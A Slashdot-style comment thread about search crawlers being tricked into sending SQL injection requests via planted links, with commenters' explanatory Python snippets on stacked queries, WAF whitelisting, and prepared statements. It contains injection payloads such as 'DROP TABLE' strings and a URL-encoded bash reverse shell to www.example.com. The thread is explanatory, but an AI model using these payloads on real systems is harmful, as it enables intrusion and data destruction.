Google Bots Doing SQL Injection Attacks
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."
Doing a good deed for your competition by linking them from your site, hmm? :)
Laughter is the Spackle of the Soul.
It's "couldn't care less", not "could care less". Sheeesh.
If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.
How is that news? Zalewski wrote a book on that years ago ("Silence on the Wire").
TFA seems to place all the blame on Google.
Fact is, Google is not the only one crawling the Net. Yahoo and Bing do it too, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
My Hello World is 512 bytes. But it's also a valid Fat12 boot sector, Fat12 file reader, and Pmode routine.
This is Slashdot. What do we know about GET HEAD methods?
That doesn't really have much to do with anything: a lot of DB connection/query libraries allow stacked queries (i.e. more than one query, separated by ';'), so by appending your own SQL query (say, a DELETE) via a vulnerable input you can still do plenty of damage, even via a GET request.
TFA isn't newsworthy in my opinion, this has been known for a while now.
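To make the stacked-query point concrete, here is a minimal sketch in Python using the standard sqlite3 module. Python's plain execute() refuses to run more than one statement, so executescript() stands in here for a driver with stacked queries enabled; the parts table and the lookup_unsafe handler are hypothetical.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # In-memory stand-in for "Site B": one table of catalog data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE parts (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO parts (name) VALUES (?)", [("bolt",), ("nut",)])
    conn.commit()
    return conn


def lookup_unsafe(conn: sqlite3.Connection, part_id: str) -> None:
    # VULNERABLE, hypothetical GET handler: the raw parameter is pasted into SQL.
    # executescript() runs every ';'-separated statement, standing in for a
    # driver that allows stacked queries.
    conn.executescript(f"SELECT name FROM parts WHERE id = {part_id};")


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row[0] == 1


conn = make_db()
lookup_unsafe(conn, "1")                    # the intended, read-only use
lookup_unsafe(conn, "1; DROP TABLE parts")  # what a planted link could carry
print(table_exists(conn, "parts"))          # False
```

The "SELECT" the handler meant to run still runs; the second statement simply rides along with it.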
The trick is that retrieval can be dangerous by itself if you're using the database and forgot to sanitize your SQL. Being a moron can't be solved by an RFC.
This is Slashdot. What do we know about GET HEAD methods?
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
Which is a great segue to the obligatory xkcd comic!
http://xkcd.com/327/
Well, that's a nice idea, but literally every dynamic site ever breaks this convention, including the one you're using right now.
In the scenario listed, if you were the hacker trying to cover his tracks, how would you ever know if the attack was successful or not?
The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you query a read/write-capable db for something like a parts catalog, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.
Blaming Google or any other crawler-spider-bot, despite my other disdain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times, but if you don't parse, you're a target for all sorts of injection goodies.
---- Teach Peace. It's Cheaper Than War.
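One reading of "parser constraints on the query" is an allowlist: check the incoming parameter against the exact format you expect and reject anything else before it gets near the database. A minimal Python sketch, assuming a hypothetical part-number format of two capital letters, a hyphen, and four digits; it complements parameterized queries rather than replacing them.

```python
import re

# Hypothetical part-number format, e.g. "AB-1234".
PART_ID = re.compile(r"[A-Z]{2}-[0-9]{4}")


def parse_part_id(raw: str) -> str:
    """Accept only input that matches the expected format exactly."""
    if PART_ID.fullmatch(raw) is None:
        raise ValueError(f"invalid part id: {raw!r}")
    return raw


print(parse_part_id("AB-1234"))  # AB-1234
try:
    parse_part_id("AB-1234' OR '1'='1")
except ValueError as err:
    print(err)  # rejected before any SQL is built
```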
If Microsoft follows links shown in "private" Skype conversations (and probably several NSA programs do too), they could be used to attack sites this way. It would be pretty ironic to have government sites with their DBs wiped by an SQL attack coming from an NSA server.
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
When the devs started getting real head?
When information is power, privacy is freedom.
I vaguely recall an article years ago on something like The Daily WTF where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data were getting trashed repeatedly, until he figured out it was the crawling bots.
This is nothing new: unskilled developers using the wrong methods and getting burned.
What is going on?
It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.
No, what's really happening is someone posted an injection URL on a forum somewhere and Googlebot ran across it. Come on, Googlebot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.
Anons need not reply. Questions end with a question mark.
I'm not sure which line of thinking you're referring to; the GP and I each just posted a technical remark. Also (to my great joy and surprise) no one is blaming Google (at least not yet), and rightly so.
As for the back-end countermeasures you described, you are of course spot on. However, it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have the foresight to set up and use different DB roles, each with the absolute least privileges for the queries you expect to perform through them.
Yes, we agree: the problem is with blaming Google, and I was affirming the silliness of it. What I had in mind, but didn't present (and I apologize), is that query code has become awful; let me count the ways.
Further, when I'm forced to look at page code, I reel at what it reveals about the mindset: cut-and-paste APIs glued together with mucilage (if it's that good). Everyone else is now to blame, not the mosh pit of duct-taped code. Sorry, bad rant on a bad day.
This guy (whom I won't name; you know who you are) was once writing some PHP code for a webapp. The app had some delete links, and apparently he hadn't finished the authentication code, so Googlebot crawled his site, followed all of the delete links, and completely wiped out his database.
Of course, you can keep googlebot away from your crappy code with robots.txt too...
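A robots.txt rule only keeps out crawlers that choose to honor it, and it does nothing about the underlying bug, but Python's standard urllib.robotparser shows how a compliant crawler interprets one. The /admin/ path and the example.com URLs are hypothetical.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt keeping well-behaved crawlers out of /admin/.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

print(parser.can_fetch("Googlebot", "https://example.com/admin/delete?id=7"))  # False
print(parser.can_fetch("Googlebot", "https://example.com/catalog?id=7"))       # True
```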
'Someone failed at the most basic level here and it wasn't Google. From RFC 2616 (HTTP) Section 9.1, Safe and Idempotent Methods: "In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered 'safe'."' (Matthieu Heimer)
That's the funny thing about programming -- you can enforce good behavior and block bad behavior.
s/(['";()&|*-])/\\\1/g
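Roughly the same escaping in Python, with the hyphen placed last in the character class so it is read literally rather than as a range. This is a sketch of blacklist escaping only, and backslash_escape is a hypothetical name: whether a backslash escapes anything depends on the database (MySQL honors backslash escapes by default, while standard SQL escapes a single quote by doubling it), which is one reason the next comment recommends prepared statements.

```python
import re

# The characters from the one-liner: ' " ; ( ) & | * and a literal '-' (placed last).
SPECIAL = re.compile(r"""(['";()&|*-])""")


def backslash_escape(value: str) -> str:
    # Prefix each listed character with a backslash (blacklist escaping).
    return SPECIAL.sub(r"\\\1", value)


print(backslash_escape("O'Brien; --"))  # O\'Brien\; \-\-
```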
The point is not that you can attack a lousy website using GET requests. The idea is that HTTP firewalls should not blatantly whitelist Googlebot and other web crawlers for the sake of SEO, because Googlebot will follow malicious links from other websites.
So let's say you have a filter with rules that block common SQL injections in GET request parameters. This is a weak security practice, but it can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be bypassed IF you whitelisted Googlebot.
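A minimal Python sketch of that bypass, assuming a hypothetical filter that checks query strings against a few naive regex rules but skips them whenever the User-Agent mentions Googlebot. The attacker never talks to the site directly: the request genuinely comes from the crawler, which followed a planted link.

```python
import re

# Hypothetical, deliberately naive rules of the kind described above.
SQLI_RULES = [
    re.compile(p, re.IGNORECASE)
    for p in (r"\bunion\b.+\bselect\b", r";\s*drop\b", r"'\s*or\s*'1'\s*=\s*'1")
]
TRUSTED_AGENTS = ("Googlebot",)  # the whitelist that opens the hole


def allow_request(user_agent: str, query: str, whitelist_crawlers: bool) -> bool:
    if whitelist_crawlers and any(bot in user_agent for bot in TRUSTED_AGENTS):
        return True  # crawler traffic skips the rules entirely
    return not any(rule.search(query) for rule in SQLI_RULES)


payload = "id=1; DROP TABLE users"
bot = "Mozilla/5.0 (compatible; Googlebot/2.1)"
print(allow_request("Mozilla/5.0", payload, whitelist_crawlers=True))  # False
print(allow_request(bot, payload, whitelist_crawlers=True))            # True
print(allow_request(bot, payload, whitelist_crawlers=False))           # False
```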
If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
Then you don't need to waste CPU time and memory escaping input data.
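A minimal sketch of the prepared-statement approach using Python's standard sqlite3 module, whose ? placeholders pass values separately from the SQL text; sqlite3 also keeps a per-connection cache of compiled statements (the cached_statements argument to connect()). The students table is illustrative, and the input string is the one from the xkcd strip linked earlier in the thread.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE students (name TEXT)")

name = "Robert'); DROP TABLE Students;--"
# The ? placeholder binds the value separately from the SQL text, so the
# database never parses it as SQL and no manual escaping is needed.
conn.execute("INSERT INTO students (name) VALUES (?)", (name,))
conn.commit()

rows = conn.execute("SELECT name FROM students").fetchall()
print(rows == [(name,)])  # True: stored verbatim, table intact
```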
It's not the admins of the sites embedding the links who are the problem. They're the attackers. The fault lies with the admins of the sites the links point to.
Does it? The AJAX requests Slashdot uses are POST requests, not GET.
Anything handling a GET request shouldn't be using a database connection with delete, insert or update grants.
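SQLite has no database users or GRANTs, so this Python sketch approximates the idea with a read-only connection (the mode=ro URI parameter) for the code that serves GET requests; on a server database you would instead create a separate role with only SELECT privileges. The file name and table are hypothetical.

```python
import pathlib
import sqlite3
import tempfile

# Writable "admin" connection builds a hypothetical site database file.
db_path = pathlib.Path(tempfile.mkdtemp()) / "site.db"
admin = sqlite3.connect(db_path)
admin.execute("CREATE TABLE pages (title TEXT)")
admin.execute("INSERT INTO pages VALUES ('home')")
admin.commit()
admin.close()

# The code serving GET requests gets a read-only connection via the SQLite URI
# parameter mode=ro, so even an injected DELETE cannot change anything.
reader = sqlite3.connect(db_path.resolve().as_uri() + "?mode=ro", uri=True)
print(reader.execute("SELECT title FROM pages").fetchall())  # [('home',)]

try:
    reader.execute("DELETE FROM pages")
except sqlite3.OperationalError as err:
    print("write refused:", err)
```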
so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.
That would be a bug in the application.
The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.
For all I know, if there's a bug in the application, adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261%202%3E%261 to the GET string will drop me a shell, which is decidedly non-idempotent.
I'd say that since half of the subject of this discussion is about SQL injection, the webapps in question are axiomatically buggy.
So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.
That's kind of cool, actually.
I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.
I do not fail; I succeed at finding out what does not work.
But how would advertisers and the NSA track you then? ;)
Seriously though, are you saying that if you read some webmail with a GET, the webmail app shouldn't mark the mail as read? Or that you'll have to add some AJAX to mark it as read via a POST request?
There are very many different types of legitimate webapps in the world, so it is really silly to think a GET request should never do a delete, insert or update.
This example is complete nonsense. Idempotence is the property of having the same result whether done once or any number of times. So, an email message being marked read if any GETs have been made is exactly the type of change that should be expected to occur as the result of a GET.
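A small Python sketch of the definition given above, using a hypothetical mailbox: marking a message read gives the same state however many times it is repeated, while a view counter does not. Note that RFC 2616 treats "safe" (Section 9.1.1) and "idempotent" (Section 9.1.2) as separate properties, so this illustrates only the latter.

```python
def mark_read(mailbox: dict[int, bool], msg_id: int) -> dict[int, bool]:
    # Idempotent: setting the flag to True again changes nothing.
    updated = dict(mailbox)
    updated[msg_id] = True
    return updated


def increment_views(counters: dict[int, int], msg_id: int) -> dict[int, int]:
    # Not idempotent: every call changes the state again.
    updated = dict(counters)
    updated[msg_id] = updated.get(msg_id, 0) + 1
    return updated


box = {1: False}
once = mark_read(box, 1)
twice = mark_read(once, 1)
print(once == twice)  # True

views = {1: 0}
print(increment_views(views, 1) == increment_views(increment_views(views, 1), 1))  # False
```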
When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was Googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.
(I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
If there's a GET request that successfully executes DROP DATABASE, it will have the same "Error: can't connect to database" result on the user's end, and all data deleted on the server's end, however many times you call it. Idempotence!
is awesome.
Never say never. Ah!! I did it again!
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. Nobody cares.
You'd have thought they learned their lesson when dealing with Bobby Tables, aka "Robert'); DROP TABLE Students;--".
This attack was described by Michal Zalewski in Phrack 57, "Against the System: Rise of the Robots".
http://www.phrack.org/issues.html?issue=57&id=13#article
Release date? 2001.
Please don't spill your regurgitated news on my shoes.
If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.
I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
And you know what the funny thing about databases is? You can create users with read-only access, if you really need those GET requests. Not sure if that's the best design (even a SELECT statement can reveal stuff that's not meant to be shown to the end user), but it sure leaves you with one less potential security hole to worry about.
So they do care a bit then?
The Caring Continuum - http://incompetech.com/Images/caring.png
Wanna buy a shirt?
https://www.redbubble.com/people/stealthfinger/shop?asc=u
In several cases, the SQLi target was posted in a hacking forum, blog or exploit site; then Google's bots requested the link and indexed it (title, content).
"It seems that while Google could really care less..."
should read:
"It seems that while Google really couldn't care less..."
My god, it's 2013 and we're talking about SQL injection? If you're not parameterizing your SQL, you're doing it wrong.
Michal Zalewski wrote about this "attack" in a Phrack article back in 2001: http://www.cgisecurity.com/lib/Rise-of-the-robots.txt
Funny side note: he now works on the Google Security Team.
Some of us used to know about GET HEAD but it was overwritten by GET MARRIED
In 2001, Michal Zalewski published an article in Phrack #57 entitled “Against the System: Rise of the Robots” describing this very thing. In it, Zalewski described a series of experiments he performed showing how the search engine indexing bots of the day could be misused to launch a variety of web attacks.
I independently rediscovered these issues in 2009 and reported them to Microsoft Bing and Google. Microsoft eventually made some changes to their search bot and credited me on their website, but Google basically responded that it "works as designed".
"couldn't care less"
If you could care less it would not really be worth mentioning.
Article X: The powers not delegated... by the Constitution...are reserved...to the people
The first time I saw this was in 2008. There was an attack that was spread in exactly this method. Here's an article on the exact attack. http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
web bot follows web link on web page.
Even if you don't bother to edit your robots.txt file, I believe you can curtail this phenomenon by using POST rather than GET for links that change data
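A minimal sketch of that idea in Python, using a hypothetical dispatcher rather than any real framework: delete actions only run on POST, so a crawler that merely follows links with GET gets a 405 and changes nothing. Crawlers are generally understood not to submit POST forms, but that is a convention, not a guarantee, and it is no substitute for the authentication mentioned earlier in the thread.

```python
def handle(method: str, path: str, store: dict[str, str]) -> int:
    """Return an HTTP status code for a hypothetical contacts app; only POST may delete."""
    if path.startswith("/delete/"):
        if method != "POST":
            return 405  # Method Not Allowed: following a link cannot trigger this
        store.pop(path.removeprefix("/delete/"), None)
        return 303  # See Other: redirect after the POST
    return 200 if method in ("GET", "HEAD") else 405


contacts = {"alice": "555-0100"}
print(handle("GET", "/delete/alice", contacts), contacts)   # 405 {'alice': '555-0100'}
print(handle("POST", "/delete/alice", contacts), contacts)  # 303 {}
```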
It's great that you and the other AC can describe programming best practices. Sounds like you've single-handedly solved the problem of bad programming. Now if you can just go back and fix up the millions of vulnerable sites, the world will be a better place.
Thank you.
I've seen these come from Google and Bing. One of the real threats is that you won't notice it's coming from a legit crawler and will block the IP. This could have dramatic effects on the SEO for a site.
I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.
And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.